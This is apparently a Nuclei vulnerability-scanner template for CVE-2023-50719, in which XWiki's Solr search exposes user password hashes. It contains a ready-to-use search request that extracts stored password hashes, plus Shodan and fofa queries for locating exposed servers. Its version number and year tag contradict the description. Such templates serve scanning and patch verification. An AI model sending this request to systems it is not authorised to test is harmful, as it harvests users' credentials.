51 lines
2.2 KiB
YAML
51 lines
2.2 KiB
YAML
id: CVE-2023-50719
|
|
|
|
info:
|
|
name: XWiki < 4.10.15 - Sensitive Information Disclosure
|
|
author: ritikchaddha
|
|
severity: high
|
|
description: |
|
|
XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren't accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability.
|
|
impact: |
|
|
Successful exploitation could lead to disclosure of the password hashes of all users.
|
|
remediation: |
|
|
This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1.
|
|
reference:
|
|
- https://jira.xwiki.org/browse/XWIKI-21208
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-50719
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2023-50719
|
|
cwe-id: CWE-359
|
|
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
verified: true
|
|
vendor: xwiki
|
|
product: xwiki
|
|
shodan-query: html:"data-xwiki-reference"
|
|
fofa-query: body="data-xwiki-reference"
|
|
tags: cve,cve2024,xwiki,password,exposure
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale="
|
|
- "{{BaseURL}}/xwiki/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale="
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "hash:SHA</span>"
|
|
- "XWikiUsers[0].password"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502202437cb05b76cc5a1500aecb995aa4be41861019af9c10335562818daa42e9e73022100a898352082fe08b207ef79b8b9d95c2053177f0beabcf3e7b7fe7c3172155532:922c64590222798bb761d5b6d8e72950 |